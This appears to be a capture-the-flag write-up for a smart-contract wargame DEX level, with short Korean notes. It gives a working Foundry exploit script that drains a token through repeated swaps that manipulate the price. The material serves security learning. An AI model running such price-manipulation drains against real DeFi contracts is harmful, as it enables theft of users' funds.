The goal of this level is for you to hack the basic DEX contract below and steal the funds by price manipulation.
You will start with 10 tokens of token1 and 10 of token2. The DEX contract starts with 100 of each token.
You will be successful in this level if you manage to drain all of at least 1 of the 2 tokens from the contract, and allow the contract to report a "bad" price of the assets.
Quick note
Normally, when you make a swap with an ERC20 token, you have to approve the contract to spend your tokens for you. To keep with the syntax of the game, we've just added the approve method to the contract itself. So feel free to use contract.approve(contract.address, ) instead of calling the tokens directly, and it will automatically approve spending the two tokens by the desired amount. Feel free to ignore the SwappableToken contract otherwise.Things that might help:
How is the price of the token calculated?
How does the swap method work?
How do you approve a transaction of an ERC20?
Theres more than one way to interact with a contract!
Remix might help
What does "At Address" do?
- DEX의 교환 비율을 악용하여 한 종류의 토큰을 모두 소유하거나 두 토큰 모두를 고갈시키는 것이 목표 !!
- 컨트랙트는 getSwapPrice 함수를 사용해 교환 비율을 계산하는데, 이 비율은 두 토큰의 현재 잔액에 의해 결정되므로 이걸 이용하면 될 것. ㅏㅌ다
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "forge-std/Script.sol";
import "../instances/Ilevel22.sol";
contract DexExploit is Script {
Dex dex = Dex(0x84c765cfdbA36b9e81Db0eb7C9356eed77296ed6);
function run() external {
vm.startBroadcast();
dex.approve(address(dex), 1000);
address token1 = dex.token1();
address token2 = dex.token2();
dex.swap(token1, token2, 10);
dex.swap(token2, token1, 15);
dex.swap(token1, token2, 20);
dex.swap(token2, token1, 25);
dex.swap(token1, token2, 30);
dex.swap(token2, token1, 40);
vm.stopBroadcast();
}
}
